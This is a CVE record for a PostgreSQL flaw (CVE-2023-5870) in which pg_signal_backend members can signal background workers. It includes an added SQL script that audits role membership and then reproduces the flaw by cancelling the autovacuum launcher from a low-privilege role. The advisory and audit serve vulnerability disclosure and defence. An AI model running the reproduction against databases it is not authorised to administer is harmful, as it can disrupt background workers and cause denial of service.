
CVE-2023-5870

PostgreSQL: role pg_signal_backend can signal certain superuser processes.

Published: 2023-12-10    Last updated: 2024-12-02    Reserved: 2023-10-31

A flaw was found in PostgreSQL involving the pg_signal_backend role. The documentation states that members of this role cannot signal a backend owned by a superuser, yet they could signal background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher, because those processes advertise no role OID and the ownership check did not treat that as superuser ownership. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote, highly privileged user (a database login holding pg_signal_backend) to launch a denial of service (DoS) attack against such a worker.
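The script below is an added example, not part of the CVE record and not PostgreSQL's own code. Run as a superuser in psql, it audits which non-superuser roles hold pg_signal_backend, lists the background processes the record describes, and then reproduces the flawed ownership check from a low-privilege role by trying to cancel the autovacuum launcher. The role name signaler is hypothetical. The fixed upstream minor releases quoted in the comments (16.1, 15.5, 14.10, 13.13, 12.17, 11.22) come from the PostgreSQL 2023-11-09 release announcement, not from this page.

```sql
-- Added example (not from the CVE record). Assumes a superuser psql session.
-- The role name "signaler" is hypothetical.

-- 0. Server version: releases older than 16.1 / 15.5 / 14.10 / 13.13 / 12.17 /
--    11.22 (upstream fix set of 2023-11-09) still have the flawed check.
SHOW server_version;

-- 1. Which non-superuser roles hold pg_signal_backend? Each of them can
--    exercise this flaw on an unpatched server, so the list is the set of
--    accounts whose compromise matters here.
SELECT member.rolname AS holder
  FROM pg_auth_members m
  JOIN pg_roles grp    ON grp.oid = m.roleid
  JOIN pg_roles member ON member.oid = m.member
 WHERE grp.rolname = 'pg_signal_backend'
   AND NOT member.rolsuper;

-- 2. Processes other than client sessions, i.e. the launchers and workers the
--    record names plus any extension-owned background workers. These are the
--    processes that advertise no role OID.
SELECT pid, backend_type, usename
  FROM pg_stat_activity
 WHERE backend_type <> 'client backend'
 ORDER BY backend_type;

-- 3. Reproduce the check from a low-privilege role: create it, grant it only
--    pg_signal_backend, and switch to it (superusers may SET ROLE to any role;
--    after the switch, superuser() inside pg_cancel_backend is false).
CREATE ROLE signaler NOSUPERUSER NOCREATEDB NOCREATEROLE NOLOGIN;
GRANT pg_signal_backend TO signaler;
SET ROLE signaler;

-- 4. Try to cancel the autovacuum launcher. This core process tolerates the
--    signal, which is why the record limits real impact to non-core workers.
--    Unpatched server: returns t (the signal was delivered).
--    Patched server:   fails with an insufficient-privilege error, because a
--                      role OID of 0 is now treated as superuser-owned.
SELECT pg_cancel_backend(pid)
  FROM pg_stat_activity
 WHERE backend_type = 'autovacuum launcher';

-- 5. Clean up.
RESET ROLE;
DROP ROLE signaler;
```

Step 1 is the part worth keeping as a recurring audit: on an unpatched server the practical mitigation is to restrict pg_signal_backend membership to accounts you would already trust with superuser-level disruption, and to confirm that any extension-provided background worker (step 2) recovers from SIGINT and SIGTERM.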

CNA assigner: redhat (53f830b8-0a3f-465b-8143-3b8a9948e749) Requested by: n/a

Metrics

CVSS version: 3.1
Base score: 2.2 (Low)
Vector string: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L

Opam packages affected (5)

conf-mingw-w64-postgresql-i686
conf-mingw-w64-postgresql-x86_64
conf-postgresql
ocsigen-start
postgresql

Products affected (45 entries covering 19 distinct products, all from vendor Red Hat)

Product | Vendor
RHACS-4.1-RHEL-8 | Red Hat
RHACS-3.74-RHEL-8 | Red Hat
Red Hat Advanced Cluster Security 4.2 | Red Hat
Red Hat Enterprise Linux 6 | Red Hat
Red Hat Enterprise Linux 7 | Red Hat
Red Hat Enterprise Linux 8 | Red Hat
Red Hat Enterprise Linux 8.2 Advanced Update Support | Red Hat
Red Hat Enterprise Linux 8.2 Telecommunications Update Service | Red Hat
Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions | Red Hat
Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support | Red Hat
Red Hat Enterprise Linux 8.4 Telecommunications Update Service | Red Hat
Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions | Red Hat
Red Hat Enterprise Linux 8.6 Extended Update Support | Red Hat
Red Hat Enterprise Linux 8.8 Extended Update Support | Red Hat
Red Hat Enterprise Linux 9 | Red Hat
Red Hat Enterprise Linux 9.0 Extended Update Support | Red Hat
Red Hat Enterprise Linux 9.2 Extended Update Support | Red Hat
Red Hat Software Collections | Red Hat
Red Hat Software Collections for Red Hat Enterprise Linux 7 | Red Hat
